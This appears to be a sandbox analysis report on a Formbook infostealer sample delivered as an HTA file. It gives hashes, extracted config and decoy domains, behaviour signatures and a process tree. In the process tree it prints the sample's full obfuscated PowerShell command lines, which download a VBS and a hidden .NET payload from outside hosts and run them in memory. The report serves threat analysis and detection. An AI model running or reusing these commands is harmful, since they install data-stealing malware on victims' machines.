Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250129-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04/02/2025, 05:37

General

  • Target

    nicetomeetyoulittleheartsweetheartsheisbeautifulgirl.hta

  • Size

    14KB

  • MD5

    24a0a0feeb3c8ddf4e0a8480107d5a47

  • SHA1

    826364c4e1b951b3cb5d0c5d82db4a8e59e05140

  • SHA256

    56966ff863d37f048e873725f57c3d6ea7883c4c20c033f2bd5f85adeec1b62b

  • SHA512

    2c318b518bf94a264dfc6ae8938a00b7f915a38f7105b4c7df7799fd242b9906e4147644f26b5f2ecdcf892f5186efcd9c5182ef1e8f155b460a24d7ba5cac3e

  • SSDEEP

    48:3aodOOQvMUUdOOQHnMUvMxyhz+rntkpyr+slA6Y8TurdkGijmQdkrC3dOOQe0dO1:qoOMhQM1AhmtscdlRB/arEY/PMfW+

Malware Config

Extracted

Family

formbook

Version

4.1

Campaign

b101

Decoy

ent-apartments-2801.click

lsyw.top

eccurastock.online

j958.net

eepelement.tech

rueblueimpact.shop

etechhome.net

ianchui.cfd

mall-business-22321.bond

tatewidefinancialservices.net

orbitmac.info

ovehkjepe88.club

zzhmamn.xyz

uslimbooking.net

uto253.pro

ortalexpresscliepr.lat

tikk.shop

iaoniang.cfd

sdg-6603.cyou

myd.net

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

  • Formbook family
  • Formbook payload 2 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Evasion via Device Credential Deployment 2 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 62 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of UnmapMainImage
    • Suspicious use of WriteProcessMemory
    PID:3440
    • C:\Windows\SysWOW64\mshta.exe
      C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\nicetomeetyoulittleheartsweetheartsheisbeautifulgirl.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4800
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" "/C PoWeRSHelL.exE -EX BYPAsS -nOp -W 1 -c dEVICeCREdEnTIAlDeplOymEnT.Exe ; inVoKe-ExprEsSion($(INVOKe-exPrESSiON('[sYSTEM.Text.EncOdINg]'+[chAr]58+[CHAR]0X3A+'UTF8.GetsTRIng([SYSTem.cONVErt]'+[CHAr]0x3a+[CHaR]0X3a+'FroMbAsE64sTRING('+[ChAr]0X22+'JDdCUEZBRDBaMCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1CRXJkZUZJbklUSU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZrcU16UmNQTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVVl6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBreVhyTGRULHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmcsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJmYSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieENOZGVoTGkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckV4SEljZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ3QlBGQUQwWjA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguMjMuMTg3LjE1MC94YW1wcC9mYm4vbmljZXRvbWVldHlvdWxpdHRsZWhlYXJ0c3dlZXRoZWFydHNoZWlzYmVhdXRpZnUuZ0lGIiwiJEVOdjpBUFBEQVRBXG5pY2V0b21lZXR5b3VsaXR0bGVoZWFydHN3ZWV0aGVhcnRzaGVpc2JlYXV0aWYudmJzIiwwLDApO1NUQVJULXNMRWVQKDMpO0ludk9LRS1pVGVtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcbmljZXRvbWVldHlvdWxpdHRsZWhlYXJ0c3dlZXRoZWFydHNoZWlzYmVhdXRpZi52YnMi'+[CHAR]0x22+'))')))"
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4424
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          PoWeRSHelL.exE -EX BYPAsS -nOp -W 1 -c dEVICeCREdEnTIAlDeplOymEnT.Exe ; inVoKe-ExprEsSion($(INVOKe-exPrESSiON('[sYSTEM.Text.EncOdINg]'+[chAr]58+[CHAR]0X3A+'UTF8.GetsTRIng([SYSTem.cONVErt]'+[CHAr]0x3a+[CHaR]0X3a+'FroMbAsE64sTRING('+[ChAr]0X22+'JDdCUEZBRDBaMCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1CRXJkZUZJbklUSU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZrcU16UmNQTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVVl6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBreVhyTGRULHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmcsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJmYSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieENOZGVoTGkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckV4SEljZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ3QlBGQUQwWjA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguMjMuMTg3LjE1MC94YW1wcC9mYm4vbmljZXRvbWVldHlvdWxpdHRsZWhlYXJ0c3dlZXRoZWFydHNoZWlzYmVhdXRpZnUuZ0lGIiwiJEVOdjpBUFBEQVRBXG5pY2V0b21lZXR5b3VsaXR0bGVoZWFydHN3ZWV0aGVhcnRzaGVpc2JlYXV0aWYudmJzIiwwLDApO1NUQVJULXNMRWVQKDMpO0ludk9LRS1pVGVtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcbmljZXRvbWVldHlvdWxpdHRsZWhlYXJ0c3dlZXRoZWFydHNoZWlzYmVhdXRpZi52YnMi'+[CHAR]0x22+'))')))"
          4⤵
          • Blocklisted process makes network request
          • Evasion via Device Credential Deployment
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4120
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\c4p2mdyp\c4p2mdyp.cmdline"
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:3628
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD419.tmp" "c:\Users\Admin\AppData\Local\Temp\c4p2mdyp\CSC5FDA28BE35D54929AE7AB778D87BF34D.TMP"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:4512
          • C:\Windows\SysWOW64\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\nicetomeetyoulittleheartsweetheartsheisbeautif.vbs"
            5⤵
            • Checks computer location settings
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:3164
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABvAHIAaQBnAGkAbgBhAGwAVABlAHgAdAAgAD0AIAAnAHQAeAB0AC4AZQBtAHIAbwBmAG4AZQBlAHMAcgBlAHYAZQByAG8AZgBsAHIAaQBnAGwAdQBmAGkAdAB1AGEAZQBiAGwAcgBpAGcAdABzAGUAYgBsAHIAaQBnAGUAYwBpAG4ALwBuAGIAZgAvAHAAcABtAGEAeAAvADAANQAxAC4ANwA4ADEALgAzADIALgA4ADkAMQAvAC8AOgBwAHQAdABoACcAOwAkAHIAZQBzAHQAbwByAGUAZABUAGUAeAB0ACAAPQAgACQAbwByAGkAZwBpAG4AYQBsAFQAZQB4AHQAIAAtAHIAZQBwAGwAYQBjAGUAIAAnACMAJwAsACAAJwB0ACcAOwAkAGkAbQBhAGcAZQBVAHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwByAGUAcwAuAGMAbABvAHUAZABpAG4AYQByAHkALgBjAG8AbQAvAGQAYQB4AHcAdQBhADYAMwB5AC8AaQBtAGEAZwBlAC8AdQBwAGwAbwBhAGQALwB2ADEANwAzADgAMwAzADQANQAzADMALwBhAGwAYwBiADQAaAB0AG8AbAB6AHYAZgBoAHoAegB1AGYAcQBoADUALgBqAHAAZwAnADsAJAB3AGUAYgBDAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABpAG0AYQBnAGUAQgB5AHQAZQBzACAAPQAgACQAdwBlAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAaQBtAGEAZwBlAFUAcgBsACkAOwAkAGkAbQBhAGcAZQBUAGUAeAB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAaQBtAGEAZwBlAEIAeQB0AGUAcwApADsAJABzAHQAYQByAHQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACQAZQBuAGQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABzAHQAYQByAHQARgBsAGEAZwApADsAJABlAG4AZABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAGUAbgBkAEYAbABhAGcAKQA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AZwB0ACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAKwA9ACAAJABzAHQAYQByAHQARgBsAGEAZwAuAEwAZQBuAGcAdABoADsAJABiAGEAcwBlADYANABMAGUAbgBnAHQAaAAgAD0AIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AIAAkAHMAdABhAHIAdABJAG4AZABlAHgAOwAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACwAIAAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAKQA7ACQAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACkAOwAkAHQAeQBwAGUAIAA9ACAAWwBDAGwAYQBzAHMATABpAGIAcgBhAHIAeQAxAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAG0AYQBpAG4AJwApAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIABAACgAJAByAGUAcwB0AG8AcgBlAGQAVABlAHgAdAAsACcAZgBhAGwAcwBlACcALAAnAGEAcwBwAG4AZQB0AF8AYwBvAG0AcABpAGwAZQByACcALAAnAGYAYQBsAHMAZQAnACkAKQA=')) | Invoke-Expression"
              6⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:3920
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                7⤵
                  PID:5100
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                  7⤵
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious behavior: MapViewOfSection
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3892
      • C:\Windows\SysWOW64\msdt.exe
        "C:\Windows\SysWOW64\msdt.exe"
        2⤵
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3360
        • C:\Windows\SysWOW64\cmd.exe
          /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:4988

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      fb1df442f2cee34456c6ed9064318559

      SHA1

      729e8f61f181b303d25e1f709399db242d82c6c2

      SHA256

      75207b26127c0778928b2c0ce51d371a1b4f5a4c47596902f88dbff9ddd16a79

      SHA512

      d6df1b8e17733d65ae332d20a22fcbc2cdec8df38a705b694b4d87b2f0c9c287378791c3da2cb2142e95f31df1b4209e01a17a83eabfcb2175f38a9207ad0294

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      19KB

      MD5

      06bae8a862675c1fc193c785f78932a2

      SHA1

      e185c5a6c6fb099666c2ccaf33a9e1ea216209b2

      SHA256

      9c845ea914e8c752541fa67526b6da2e8225db9757996bb7633839297ce5916b

      SHA512

      40f9e757bff6772e648823e4ae7f4f855c28a36fabf944f72096b5523d60e6a81e127740724469d013211576595a8e84ef1eb8a08ce7311500dfb740a19d5938

    • C:\Users\Admin\AppData\Local\Temp\RESD419.tmp

      Filesize

      1KB

      MD5

      2d24d6ba76c2ac81d34977c31e0dd8bb

      SHA1

      5bcc249216a67886433ddd83a72d73af09cf8848

      SHA256

      40fb3431d28d41170ec09758b6e32d3df824a0943da2415d039143216c0b1dfc

      SHA512

      470078e9dd5c4e2801831d5e3e8331e3924935c454efa50835565af75616fc22e95b9152f9454aeb0f8b0b69aaf64edfb64c8c10af5289a613558fe906fc890f

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_j3bfhe4d.vii.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\c4p2mdyp\c4p2mdyp.dll

      Filesize

      3KB

      MD5

      e95fc663f8d6eaa7efbad0b69d87dcef

      SHA1

      e16cdc108c151d0e892b79121209bae353f98557

      SHA256

      8e8d88bffeacdb3e326108ddd14a0896561b6ce82281f89a2080b2b0223c0c2c

      SHA512

      53282280a36f51441f8fff6723f75d8e81762307cb57818904a9141e36ad06669fdce3674ef0c1ce4126ec4657a57d54f9bdf4d5d0d7fe0e59461eae7ffa856d

    • C:\Users\Admin\AppData\Roaming\nicetomeetyoulittleheartsweetheartsheisbeautif.vbs

      Filesize

      216KB

      MD5

      eaaecea977e9d02eb3ba12a426b9930d

      SHA1

      1b1d388b1aace23874ab95ad625f1e34ee43e234

      SHA256

      5b8920b32beba0b9c5cadf86e0e48d3df9cf33b89ed878efc06ca07ba7122f18

      SHA512

      929d244152855e99319f46f0f7d022fa127d4f628afebd26b6597e8c10265ba75eb9f1150dc0346ef51719f331f62a13669a8a366d2689996788b0d2601121e8

    • \??\c:\Users\Admin\AppData\Local\Temp\c4p2mdyp\CSC5FDA28BE35D54929AE7AB778D87BF34D.TMP

      Filesize

      652B

      MD5

      0e4d96b486966c3bb929d537e0fe76c4

      SHA1

      d5d09f5092a67c157f83693d7ca0597f5d41b0bd

      SHA256

      6e9acf919696bd258b2cd03729c75ac606b98299163c2c8c09d52b39e5af048f

      SHA512

      8acade0db52ba105ac4c5cc1d17d3b98db6eed78c595ebd72a967b410115b325dd3c04e5a4d7239faf7303a467f7bf158d17195c991b0c7d400aa8fb5a8cf901

    • \??\c:\Users\Admin\AppData\Local\Temp\c4p2mdyp\c4p2mdyp.0.cs

      Filesize

      478B

      MD5

      19c349f194ea440d75e3d8bb016a48c1

      SHA1

      e4c63d11e4345744be72671c3f698ba717fca329

      SHA256

      54d8a84d51dffcb3b93aa8c8571f35fcf1c6a567574a138f9b803479b6aad974

      SHA512

      c9cc5ac32184f5771a22e8ff0de1812d4e4e0e1a8236d8660be761382983eeced98333ff6845c70ab999c52a94d64939e50d24cc4b3caab4d80c79e5267dfb71

    • \??\c:\Users\Admin\AppData\Local\Temp\c4p2mdyp\c4p2mdyp.cmdline

      Filesize

      369B

      MD5

      c20891827c531ede192964d6e7519fe1

      SHA1

      a670324108f68c93e06872201a3c8e7d068fa95f

      SHA256

      d0d6cc4601c1dfcd26cce379938bcd3f1b1fde22a0fb5ebc8d4962efa2b7d644

      SHA512

      c601d70f7a424c24535870d68d1b9c3201177ddb21cd7f2f84c3907b7f4252744b9a84a8cb831cf7e30c7a1cf8b49cfaab704f3e5629153f90eb159eadf05e77

    • memory/3360-92-0x0000000000760000-0x00000000007B7000-memory.dmp

      Filesize

      348KB

    • memory/3360-93-0x0000000000690000-0x00000000006BF000-memory.dmp

      Filesize

      188KB

    • memory/3440-97-0x0000000002FD0000-0x0000000003094000-memory.dmp

      Filesize

      784KB

    • memory/3892-89-0x0000000000400000-0x000000000042F000-memory.dmp

      Filesize

      188KB

    • memory/3920-86-0x00000000075A0000-0x00000000075B2000-memory.dmp

      Filesize

      72KB

    • memory/3920-87-0x0000000007500000-0x000000000759C000-memory.dmp

      Filesize

      624KB

    • memory/3920-88-0x00000000074F0000-0x00000000074F6000-memory.dmp

      Filesize

      24KB

    • memory/4120-37-0x0000000007EC0000-0x000000000853A000-memory.dmp

      Filesize

      6.5MB

    • memory/4120-58-0x0000000007AA0000-0x0000000007AA8000-memory.dmp

      Filesize

      32KB

    • memory/4120-23-0x000000006DD80000-0x000000006E0D4000-memory.dmp

      Filesize

      3.3MB

    • memory/4120-33-0x0000000006AB0000-0x0000000006ACE000-memory.dmp

      Filesize

      120KB

    • memory/4120-21-0x000000006DC20000-0x000000006DC6C000-memory.dmp

      Filesize

      304KB

    • memory/4120-34-0x0000000007790000-0x0000000007833000-memory.dmp

      Filesize

      652KB

    • memory/4120-35-0x0000000071360000-0x0000000071B10000-memory.dmp

      Filesize

      7.7MB

    • memory/4120-36-0x0000000071360000-0x0000000071B10000-memory.dmp

      Filesize

      7.7MB

    • memory/4120-20-0x00000000074A0000-0x00000000074D2000-memory.dmp

      Filesize

      200KB

    • memory/4120-38-0x0000000005240000-0x000000000525A000-memory.dmp

      Filesize

      104KB

    • memory/4120-39-0x00000000078B0000-0x00000000078BA000-memory.dmp

      Filesize

      40KB

    • memory/4120-40-0x0000000007AD0000-0x0000000007B66000-memory.dmp

      Filesize

      600KB

    • memory/4120-41-0x0000000007A30000-0x0000000007A41000-memory.dmp

      Filesize

      68KB

    • memory/4120-42-0x0000000007A60000-0x0000000007A6E000-memory.dmp

      Filesize

      56KB

    • memory/4120-43-0x0000000007A70000-0x0000000007A84000-memory.dmp

      Filesize

      80KB

    • memory/4120-44-0x0000000007AB0000-0x0000000007ACA000-memory.dmp

      Filesize

      104KB

    • memory/4120-45-0x0000000007AA0000-0x0000000007AA8000-memory.dmp

      Filesize

      32KB

    • memory/4120-22-0x0000000071360000-0x0000000071B10000-memory.dmp

      Filesize

      7.7MB

    • memory/4120-19-0x0000000006520000-0x000000000656C000-memory.dmp

      Filesize

      304KB

    • memory/4120-60-0x000000007136E000-0x000000007136F000-memory.dmp

      Filesize

      4KB

    • memory/4120-61-0x0000000071360000-0x0000000071B10000-memory.dmp

      Filesize

      7.7MB

    • memory/4120-66-0x0000000071360000-0x0000000071B10000-memory.dmp

      Filesize

      7.7MB

    • memory/4120-67-0x0000000007D40000-0x0000000007D62000-memory.dmp

      Filesize

      136KB

    • memory/4120-68-0x0000000008AF0000-0x0000000009094000-memory.dmp

      Filesize

      5.6MB

    • memory/4120-18-0x00000000064E0000-0x00000000064FE000-memory.dmp

      Filesize

      120KB

    • memory/4120-74-0x0000000071360000-0x0000000071B10000-memory.dmp

      Filesize

      7.7MB

    • memory/4120-17-0x0000000006000000-0x0000000006354000-memory.dmp

      Filesize

      3.3MB

    • memory/4120-6-0x0000000005DF0000-0x0000000005E56000-memory.dmp

      Filesize

      408KB

    • memory/4120-9-0x0000000005E60000-0x0000000005EC6000-memory.dmp

      Filesize

      408KB

    • memory/4120-5-0x0000000005D50000-0x0000000005D72000-memory.dmp

      Filesize

      136KB

    • memory/4120-4-0x0000000071360000-0x0000000071B10000-memory.dmp

      Filesize

      7.7MB

    • memory/4120-3-0x00000000055D0000-0x0000000005BF8000-memory.dmp

      Filesize

      6.2MB

    • memory/4120-2-0x0000000071360000-0x0000000071B10000-memory.dmp

      Filesize

      7.7MB

    • memory/4120-1-0x0000000004F00000-0x0000000004F36000-memory.dmp

      Filesize

      216KB

    • memory/4120-0-0x000000007136E000-0x000000007136F000-memory.dmp

      Filesize

      4KB